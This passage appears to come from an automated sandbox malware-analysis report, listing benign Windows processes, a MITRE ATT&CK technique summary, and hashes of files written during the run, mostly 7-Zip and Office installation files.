1⤵
PID:11000

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:14364

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4932

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:8160

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:6076

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:8840

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:9200

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2736

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3688

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:9508

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:12508

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:12948

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3460

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:17048

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:17016

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:17064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7-zip.chm

Filesize
112KB

MD5
6303fb43732497091b51e861e2ab4961

SHA1
a69cc45388101121660647ea9eb672659f279017

SHA256
35d48f9111348887f270060b12ffe8a5f4370519b65e69261f2f9b7f1a25cf59

SHA512
56c7211aa85085859c57ffaefba5b1a385d2bdaa1bd4f13fba96a88f6e57abedcc284c6155fe49f13de049deb0c132d4156b9c63f18449d0f21859adfba0a131

Download Submit
C:\Program Files\7-Zip\7z.sfx

Filesize
209KB

MD5
453d2200d8f56150f69016ff8b8f8beb

SHA1
3ace2cb2e7f0b141348aa435132ced0ec6938e6c

SHA256
c30efcb7b48211c612bda975cf1018739e91d4cdac3e21161bcd5dce25fb94f9

SHA512
33316861be5604c8586ca3ddabcca2c51c776b27bb25d2c5321ccfd6eda281616c466212fd1663b07c814c35f9579472cebe81ce5012e9bba222ec047f515ec8

Download Submit
C:\Program Files\7-Zip\7zCon.sfx

Filesize
188KB

MD5
17a2586e21fc3b6c4a1854396dabf8bc

SHA1
c3d5dc673524ad5e149afedf4733cc86a80baabb

SHA256
9333e889fec5c51d0f3aacf59689f83c1476d355aa6e26e76e6b2ff9c260e1eb

SHA512
24a911d5fe0df65c005094945b379d91b66bfac502bfbe1b607080bdf602764b9d0b1f18f376f7160cc3cf2321dbbb2bd1d238443e07b038d3cc4a7862b1e2d6

Download Submit
C:\Program Files\7-Zip\History.txt

Filesize
57KB

MD5
4d8ad3a4d86cc554a47d3d8b0ce52ae3

SHA1
e5da98da10e6670d6196db71cf83bccb621450f7

SHA256
fcfe22e24ce31e33f98217543a742c5fa41d9f08a7398437b235306d9362740f

SHA512
e1b696f73c7d77528b588f133f8d2aacdb5a7d8d3ae3e04afed07529812d900387c95e4f081e4520eac11e7602c694f12319a935f0c247ebfa33cfecb7b8a577

Download Submit
C:\Program Files\7-Zip\Lang\af.txt

Filesize
5KB

MD5
8f1436f956d326e7c1967db476e3b78f

SHA1
3f6ba7366464ba714b6df80fb736c10bbbb6e1dc

SHA256
619ac4d210a795e9702c42d4c2b34add049e930997aad28f9c420caba8a921f8

SHA512
8d0a5ee3c3062c8a4c6d9371df4102212c3bffa973cb35703d4be8e2cc6da483f667a48192eecbcca8b6dd1fa481aa49dcde099718502fe1cf8cde4cb77434bf

Download Submit
C:\Program Files\7-Zip\Lang\an.txt

Filesize
7KB

MD5
22580e1dec6040b899bae032397c2487

SHA1
e20b620388d351ad5bfe9f31961e172cdb4810c0

SHA256
bd46b98aed5171a2e84affcaa49c8056deb9e8cc277f8072598d05ffb3b760aa

SHA512
da5657d136901308fb481147f7b0cd04e54250908045984b6f12b1bb48e4d4313ba368f054f76547bf00b8ecc90fbc2676e6f97e7eb1d993ad347f76d6efaa51

Download Submit
C:\Program Files\7-Zip\Lang\ar.txt

Filesize
12KB

MD5
7316080ed94140a60f2ee41ee76b454c

SHA1
83b0155281f0de5bde5fb50518e6cabbe8a25f84

SHA256
29a5f1ba180f4d3eaae82ceee9f399783a076dfdbffefd85731d023fa3b1f49c

SHA512
9d968e8e196fc1328c03a4632dc92cd2f652bc5a1605530cbb070e9d38055e69f00933f4ca5e15bfec91b6dda6184a087523c01cb1a9f9813f0f3cb56661dadc

Download Submit
C:\Program Files\7-Zip\Lang\ast.txt

Filesize
5KB

MD5
3701baf72510f74ff618f41d80a4ed42

SHA1
180bc10330df4f326594ff0b05e7298cd08b11f0

SHA256
d6812acab090060c25318ceebde888532fa30469346a9f96dade30d0b66f8834

SHA512
5cb630c61fb0726b0c17e9e40682b8aaa276b4a84b6352628ed26455c60b62d49e634531ef93235a5027625d077cc2455b468b1f288648adf212058d5bd0b35c

Download Submit
C:\Program Files\7-Zip\Lang\az.txt

Filesize
9KB

MD5
574112dbd581c30cc1c91deab6c33436

SHA1
ae7bab604cf12369ab056059e280dbf5a3d970ed

SHA256
3cca3589448cea22cb0132292c431d1da1ec66db056484ec881cf2512b16c972

SHA512
da994adb6a8ef1cd2245cefe3879a8fd518e05b10069f58e0c4aba4d8a67ee50ecf4da0a15381cdb2aeb26e97a94bd206a0aec797c257ffc8855b36bb0ad16ce

Download Submit
C:\Program Files\7-Zip\Lang\ba.txt

Filesize
11KB

MD5
7f1604e02b13791a7c2256daef94081e

SHA1
caf957d0ea55bd4f8ca7ab2b8cfde64edd9b901c

SHA256
5c871ca00899db82d268ecc4972004c537203a37be2a75e7d0b027210618dffc

SHA512
061df0d0e0e17df02e8d5d31121c227283d6f3eb0413c8f84d93c58dd8b3fbe31ac02db925a15596d28379451a1fd63400ae4cf700e33c3b061cdd8a3e6a0955

Download Submit
C:\Program Files\7-Zip\Lang\be.txt

Filesize
11KB

MD5
71ab23382c43dd605e06e24f708e0a33

SHA1
7a0bcdc0db92b9184bb356c870b05aa5a44943e3

SHA256
aab399cf84c74c2cf7b84c4ecdaec0f3c7cb4762167e4d8bb8bb53118bbcc81a

SHA512
14b5fbd6e88a138ca733f8f25338e61bddfd3ef1ccab28f1c07a81e567d7f9f3d4d2fb7d592b97b19646413c32f1d96e2e79087086b8db7ff590e6d14163b9d3

Download Submit
C:\Program Files\7-Zip\Lang\bg.txt

Filesize
13KB

MD5
53933c3ece6babef07522ffe67300c88

SHA1
85417975711cb5a4182b8048b4b82f2446082de4

SHA256
6063d5943e23e81eb3d6ce688d451fa406352857527cb3ce1548cb41a6834b75

SHA512
7d430de7a3474fa38f881619a4665f327936d02d39072de4b6a5a294b061c8ac1babe4477c73bcb1fd7cf4aa00335b4423aaff5600d0b83247a9dfffca9b8eac

Download Submit
C:\Program Files\7-Zip\Lang\bn.txt

Filesize
14KB

MD5
72a5fe5109b3777ecba6b39e5affa7e6

SHA1
140f7a90fdeb27a4ef28b4d1acb6b50b8f70816a

SHA256
89b312794c648ce8c42bcb62fd93b24978e879e60accd1cfdc663a36ba6f9305

SHA512
23f7820b8fc036a0d4499b0338e549c75804b2919a409973f226e903b6f16c743f7db38adbeba8cd46401bb6b9380f5fceba08d285caa55ecb4d940843d226e7

Download Submit
C:\Program Files\7-Zip\Lang\br.txt

Filesize
5KB

MD5
e81cbb8fc76ec337023b879cb7ec010c

SHA1
4a4140c3bca92121e07458f29044728608c8ae7b

SHA256
2c71f98fe9a5ee73748226c5db2916354b7ea92dd1c745bdd2e8b9538b43ba7e

SHA512
c71495b97ae973de570bbf131fc770bedc7fe4229eb4340b94b5ea3284f0530aae6b66f3b0eb6cf05aeeff0b04e5adf1b89e741e7ecf2e6fa8a4b58c1f508205

Download Submit
C:\Program Files\7-Zip\descript.ion

Filesize
642B

MD5
7913858bf1d974f9ad6d99df4a31e4dd

SHA1
6c9fe9d15488ddee4b422a9a589a096d18693572

SHA256
f159337e140550e473b5133b7904185682aabe8269df6a4d1caa973c2a0c0cd6

SHA512
a2d6ae9e6d8e4ee9b3a83abce9e0bef4adc524f8b86678348f91bc6c936f9404ada8d9d7071fc01c30e7b79cce63fdd83b0630a4da475c2730c4f0fc31cfbfdf

Download Submit
C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi

Filesize
2.7MB

MD5
e73d3a1554c2b1b3a86bb4aa5a9c5172

SHA1
03d11b5732510a959114f4514e9ffc6c1df7f1a4

SHA256
0230207c2992d91eeb24ac7bf46758cb9a402fef29d5f68930ff2d86dc852c4c

SHA512
c6aaf1ca21abb61d19c2de924f02291698e597a7747e52f884d11a13fa94ffae3857cb2e5fa221691a53e80bd84ee8f5eeb57520101ca96ce78461d4e27f2bdf

Download Submit
C:\ProgramData\Microsoft\ClickToRun\DeploymentConfig.0.xml

Filesize
2KB

MD5
ef54e7dea50dc42893c67260edb2efeb

SHA1
aa7d91f1b454685925e90ecd7dd413ae078bbb82

SHA256
15f2b0719425d74e4d4439b513673921658ba9cc484d655883ad31ff7fdc7874

SHA512
97794afdf732c89706d065eebbd74cfc5a38ca6a1eb2fb7add04982bfa24d92ce45bb22f29d1caa98c4b8a832d22dd5acce6aa958eda82b91d6d28a76f1f281f

Download Submit
C:\ProgramData\Microsoft\ClickToRun\DeploymentConfig.2.xml

Filesize
1KB

MD5
275673889fe183750e4b7bea764d501b

SHA1
ce1095ff4079b9076da55aa885e888358b6a1da6

SHA256
780d43a53db68b32fa3488cba3f277f74f11f79f9d5314a047f9b49746486015

SHA512
49487c2d6f3f68a510b982c1a0392a639965d8ebe9a5451161de6dd3b4f8236baf3423a8212459bc74fef9a57289acb69e828126b0abe707354f360c0131f71b

Download Submit
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\DeploymentConfiguration.xml

Filesize
898B

MD5
af1b6718cf488f7ece6db79d84690eb4

SHA1
a7efe673256b8cb1e78f5640abd2fd5f3ccee954

SHA256
6e5009e8cc6ce77d51a0d2c50c19f53eae2c4b8cf83abab527e3b8dc34ea49de

SHA512
4a068dc4e236f9f14a9574b6196ca132c1d3d6f24ab39e416eb382ccc46128f4b9d0ab9fdde8518d4f6ad5629057a660e7c57c205fe8c49602807afedf62d9ff

Download Submit
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml

Filesize
3.3MB

MD5
1b8a681b5a19f3caa848ddcd0f347056

SHA1
b94d0c1fb9f0d3e582dee3e41a03e845c97ec4cc

SHA256
79c261df3070e79b3c9c332260756fb782a80e3a0250f66f836c98999fd0eb6a

SHA512
e83863714dacc6e730a53faff4e74a8e351947add02fde7dad883d093876dac643e60f170b346ceeb34a24b1d9dd7abbf1543458d1919ecb8072636967c1038e

Download Submit
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\UserDeploymentConfiguration.xml

Filesize
898B

MD5
c824d04b79f1d658bb7e979fb7a7434f

SHA1
37deafe20a21d3a2d7cfe962c584283de732dbc7

SHA256
f13a67359b91c1bb7e2b8dd8e8b605e1cab5db3cbb81dab1869103c804bc33c7

SHA512
88f9b4fd495cadc48f865f97617fe261a20e0ef77f49eeded8eef1398e06a217d27da6cb0ef6e3552fb23cf1194aa5c9bc4624833ba2d9ace7c736b707b4df00

Download Submit
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\UserManifest.xml

Filesize
2.1MB

MD5
688b90f3d015bd22c64b068cbf1fbd09

SHA1
61b3583600fce3bb7db473d54125aad362fdef45

SHA256
d557a68369ddd9d2c40a11c6438a40a88d2d08cfd7739e216dc177a53104a415

SHA512
fe5310b30b3e8ab81d92d531436772115707433a9d669c5fa5bf4d509f065d54987d9ea8a4ea52af79bea2ed8abdae8775db9fdffb5b9a18bb3cd0193ed800b2

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\en-us.16\MasterDescriptor.en-us.xml

Filesize
28KB

MD5
a8edd1fdaebe6888f10f5f91b5b3c5c6

SHA1
3c619898d605872fd6e1f1e6dfd161b7923f81f2

SHA256
9b4217119620940cc1b368e9d343585fdb62bcdec588b6cffcae94632c065ab6

SHA512
68af26fbde0d97d09ec121bda8d353d644acc3cfbdc6ee98af5ed18feaddc8a1f58c9f0ecabeae28d96ce26b4db9e86b55897171bda65ee843d1891891b9f922

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\en-us.16\s641033.hash

Filesize
386B

MD5
a74b5916a84eeadd7ca36e9b980eb257

SHA1
8b3544fc39d5da30f73f79e67c6b4127f269c027

SHA256
ba5dd55baae991b72a14e7ed55a3e7dd5e60fcd6d4666d81f3b6f954b8956814

SHA512
86fb74a7f392600ec5a0514819148e611976c5e4652f597226e1993093533de975dd25750a6e5b4edd679bc95ee2a6c7c88b927d86031b7b61ae7784e594525f

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\en-us.16\stream.x64.en-us.dat.cat

Filesize
109KB

MD5
943c487045c385dafee999b38bf87c1e

SHA1
51f2c90097ac941838bef8a2b4d1bf8d716d5bd2

SHA256
d9129f87557a6f214cf0ac25e93907e081337eadb7719f351551323867f85646

SHA512
39e623fa97540da7ac731a971e8d5622dca340f53a02f6dbba1deefcafccc3b20da958852002794fdcbe087f09b9c02ff0d9d7ca506761e4e0e15a81e97b5097

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\en-us.16\stream.x64.en-us.db

Filesize
438KB

MD5
1c983ca8dace501e0b19e871326acc4b

SHA1
ae651b4b3ee3f43d84a6dbe588a878c37e8bfa68

SHA256
0c949c3caa2d022942ffd26e791e77b8b183e6255c51cab37fb4ffdcc2c3b5e9

SHA512
52dd263983052b12270895b99a546232e507b0c670dfd105ec8da7167bf53c5d125f24869ce8ca2ff1d40d80c60133ca19bab41b7b1c0e4ba8932479b390bf61

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\en-us.16\stream.x64.en-us.hash

Filesize
418B

MD5
7696cebc642e7546c95bbb8ba0113d3e

SHA1
e47434222e329fbd85c5b04d4f86cea1ca4d8fae

SHA256
1be284cd00cae13f266c1db1687b83d51c44d1c270ec081b435ee1b25945c232

SHA512
bcc7bd39b0881806f9f825110966581d4c5940cc1cf52e745b0d642954e61559449ba88ecea0b047fdbc33add251d14c47bcd871fbc9dace755970267d95f982

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\en-us.16\stream.x64.en-us.man.dat

Filesize
622KB

MD5
a8622b8769c20d11c29946af632391c9

SHA1
0ef34f99dc822bb5faa0fe80c65ddb71f085464e

SHA256
68afb63dea95127e57d880d544cd7491c4b6c00cfc0d2383549a7f5fddff80df

SHA512
2fb7c2d76e6f90b2179e65e83d4e3cd606f940b6b810b84a1416e75e296ef42dd9171e4ae93eb579f3223ea4f3ed2eff842ffdf2098c1a786d60507a4e2ef211

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\mergedVirtualRegistry.dat

Filesize
5.9MB

MD5
5c965f2c4f924a5ede39c1c18542e57a

SHA1
1ca164125ab4384f0e975228ed5e3e75078af8dd

SHA256
06203d04c759d1d4e0cbf9e6541fa7b2af6434cfb3fac74f87b0bb839a1d3df6

SHA512
8767050a67806ccb2b323e45d8367007ddb2d9d8eb279e68636a3c6e5c3d052753e83c41a05fa0092bb499efd5b342b7d5faa4c0b21c4a8f24537bfb522aa03e

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\x-none.16\MasterDescriptor.x-none.xml

Filesize
27KB

MD5
f845031fb4db790d5a023170e5b13bab

SHA1
44935675b4298f558bea746f20adde5905fa1e5c

SHA256
07eb4b6534e115b1121cbd16fa6d9f8504dd9c66d8976b4f9a380223993763ee

SHA512
8c6e104f151b745ba9d4ae61e9898ece4b0e52e3e57bf8d6be1fbe3b83cb17976319a516ada6a77ccd1b8df497d3dfcfd7002b810fc5527e19174c967c09168e

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\x-none.16\s640.hash

Filesize
386B

MD5
d2f7d4c20e0a3b12f39e84271c41c007

SHA1
c6c825a1b0e934bfe229f5a66dc2ff721247986c

SHA256
f508a63a06e3ac505ff35ff35c5102fb4308009dfbe61cce22b38e0deace8e17

SHA512
d8199336b5a9aa8bcd995593751457eff057440f0e5ac3ff0d5e1c37e0037e29daf7a7c6c2e40a9870955324950dd09ffa64e5a75d92e0ae2feea58280d58294

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\x-none.16\stream.x64.x-none.dat.cat

Filesize
574KB

MD5
4fd7b87daf85b7a46b5b7ce676085b2c

SHA1
e3ffb227c55cdea2bc8a8e1baf7f98f49590fc82

SHA256
ed9b47d10c0bcf28ac019259d742ac1817fc57d27c2078f8455fb0d6429c2313

SHA512
8c0287b3b1a24a14523e11ca6c77adf14a0ae8470cb10d4cf55a4d30d12f75e21de261766472367c4721b4892f2e18fa6d8aefe79fc8a97f93ee136d454ce0d6

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\x-none.16\stream.x64.x-none.db

Filesize
1.8MB

MD5
3c17f0c56da815435667a2561b68591d

SHA1
287e7cdfbbab5a10112cbc5cbf2aae469718c41c

SHA256
b3f555a9a2ccfe9cc4aee52792aa5e3b61fe11e2573432f69a55707fd53087aa

SHA512
7aff44c0d6b7321f7fac06fe899ce67f6f4171485bba425e335440db08b85ebe926ad4352b67085e4fd332e48ca8bed92da57bef12d74275c1240364d185d916

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\x-none.16\stream.x64.x-none.hash

Filesize
418B

MD5
e45d252ceac52b07577b24bada835e34

SHA1
3a63ee24fe3c997ba9d2c5b64262750ab70ca13d

SHA256
71c48b538c8b46524bbee42ef71bab04fdbf729369151b9b72e07b75b37f2dd0

SHA512
b92ee04915b7075f8bf813795d498575bc6717b73a8b25ff7dcc4274944b6f545890530d119cc6e28ac4263507e41a1716879ab8c5237ca2b4baf961251ce8ac

Download Submit
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\012A0661-537C-4802-8019-082A4972EEBC\x-none.16\stream.x64.x-none.man.dat

Filesize
2.6MB

MD5
5b135b9626eaa0cef4eb1137eaf46fc0

SHA1
a783815785e8b371fe8c2541d30a22d02c00ede8

SHA256
3939a8d44bdac892618556513e9b846b9dbf4be340ff9cf3560e4940c9a4523d

SHA512
9b519d3453978f74d486f9689fc1b4ec7579b68ae0972f1985378c2928ed2c9f05d90de5fab39f5c87eb54e3e5d12d5035e3044ad6694bdaf8d0a0d6e8ee357a

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.man

Filesize
412KB

MD5
8f5a8283385c28a93848855d00773a45

SHA1
fe9862b462af44b76f253547e7814c0f7e78462b

SHA256
439de41acb85313ef9a35a8021f90c8a972dac7734f15a9833c500086fab173d

SHA512
93a1ba1a6220a839d126cd06e340ff5581496554857d04361eb2c9612ae7e9049ef1b2bcb910acf899eb25e91f466fb1a0dd68ce718bd5c674e27c5b32d4ce23

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml

Filesize
16KB

MD5
1abd1eb826bbe1b7e44be9f474120d4f

SHA1
63fabdf03f1c19a819a599c6b73b3a5097e9d770

SHA256
2e5e5025c0126a23eb56728b177fb6c971b82f5afb3dc56ed0a7551331f3209f

SHA512
81f96feab7f0c00ee8d43281c4190049bb3a3c7371007165077b003de3376698e1979b4db03b21d0a093a9e133efd11bdfd49dd87e226ec1b54d9b678f456a80

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml

Filesize
150KB

MD5
43888e37687aaf8ce37919544d4881a6

SHA1
52f75e91e994de6f36f1a05ab2290b3cc24784e8

SHA256
d6848ef50d8c2ee1906f255e2c555d51c44a0f031d8640ab40688197ded565d2

SHA512
4384652d942abc7559466f34290f9d702e9d912e75ca9208ccd116dcc1f6995009d8ba05f4a3b4883401e8c28b4a726261eb192510c504851a05356ae5f70466

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml

Filesize
1KB

MD5
df65e347d5971b3e9cce576c3cfc24e2

SHA1
95aa2eeb46ff811a90cb5897d06d662a29a7e05b

SHA256
fd387d048d21e57105b68cf8c5099ae5c92fb5498ea1e7fde6735e470e53fa83

SHA512
889f9cacf2c52a0584d392dd7c201277fa810434915cdef1e8f4f81e93fe53ab9697e98ec6d81687561ce1332f2c21f5d5055b5d0ab356b28f1a07679594d007

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml

Filesize
2KB

MD5
95692403b0634d15d44c0f29effb1cad

SHA1
8c435cd35d8b0d756032008e56f168f7c0958743

SHA256
b40319e567460d7100db716f498ca732cc782bc53bd59b42d9951363c53d6263

SHA512
100dd9a03371202c3da3edca21eb1e75561f68e72b25c6e173e227afd15a43b99a8dcf9c68fcc102b9300066e8157562483b3a9e0750f8123cdd221a04d633cd

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml

Filesize
98KB

MD5
f05d35f627de0cfbbe0f7c9438b567b3

SHA1
7ca8730e98f8f6518028464d9ac9e75dbc128ea9

SHA256
b4f63a0cd82209c817adb29d6ed770c12a0512b69fe4552795cf2e97a65bb124

SHA512
ee9dfa090de769781cf80734d8c6950e1f551e93310aeb8329ba5476d90ae1f916f3f71a2351cb9347d9703273d78cc7ad3ec4f36706970fa75ddc1869ccb08d

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml

Filesize
31KB

MD5
d41c2fdd193d960cef842d3496df83b8

SHA1
650cbc962f55b38aea77cd20cb9214d70a157ca0

SHA256
2cce19ceb7efdb39126629ae7d1d8da97f44e21231872d09f936383c7085c087

SHA512
f95ce8917db11a9908a0ec2af33ab3d04d283ac31b2e769ae7071fc4d2bc2ed400babdb833687edc95091e42b994bbdd3e35fc4b625d4ed9c83cdeb73d16055e

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml

Filesize
109KB

MD5
6921cdae43e0bc479db6a5fb64b325ae

SHA1
999f782052dcbd458ab410f00a4aa7771b9e9a78

SHA256
2668013907b3c27e56be2963379b8877f76eb8ad92dc63f29b44d3506049cc8f

SHA512
bc4da99f92a08a77cdd23cbe2875ad6b786b421c24d928f6512f98ceeb7da651b9603abc4711ef03f70d1d0a740d8d72a174f10030c46da2a35b76950e4bf7f1

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xml

Filesize
14KB

MD5
d3ca2ec60a1e282399e1359f1b95638d

SHA1
575edf4fe62c646a5e8b8a12a2016ab3c98118d5

SHA256
53a65f58821934b1f0bf13b40d5dad45aadffb028d8154ca7ddb3a415dbc233c

SHA512
35226442208ab7730d2493933b396eea53c7f5dbfe671e92e6c59c3eb7f2c8db65b7ad83474f1aa46a8008156f0c22ae757b718f9479cfb4bd80d712bacda987

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.en-us.xml

Filesize
25KB

MD5
3d7822633d1de9b755ccabc221903341

SHA1
cf5560f05fc2145ccc35693564e98cb7720b1166

SHA256
9aab0cb1853343692235da729b56702503eb950168fbdcea9641e2ea80352069

SHA512
f766f6e043c03e1a8afa165c7e6bb4c0c02d70ca8b73a4d109672ea01cd6b07e8fef09d2fef38b901adb52f1ca7b8015bb7a495f5439968a2a3bc3655d86c068

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.es-es.xml

Filesize
24KB

MD5
fea2b303b0c6fd9bd5420e6cf2ef3f4c

SHA1
672d46c1ddf238e23265c7fe00a74905499bdb8d

SHA256
805be4e2c02ea77b7f14c89c33b564f26dcea35718b7d931593774c0133ee5ce

SHA512
4bb2cef6cdfa464cf1383adfd676aecc258384ae54ac77e24c56de6a1b72d4a96b9990116795cc07b81e5fb780306e3245a40472949d5874b09ae83c6bc871bb

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.fr-fr.xml

Filesize
24KB

MD5
07f9eb25451108005eb652c8c58e5e26

SHA1
644f932034795e7ad4fc0793e573f5a7a140ba1f

SHA256
b367f615933da084c79eb2208618711180c9d938468b768088829e0f637a6ac9

SHA512
3c431abea799f151e8fd513d892da8e062a8375b5ef691128b6ec94c4b4734d30046cc42b6885c57f4ce427a80814427298c718c75e6b0c6b462ad00f24a70ac

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Word.Word.x-none.msi.16.x-none.xml

Filesize
93KB

MD5
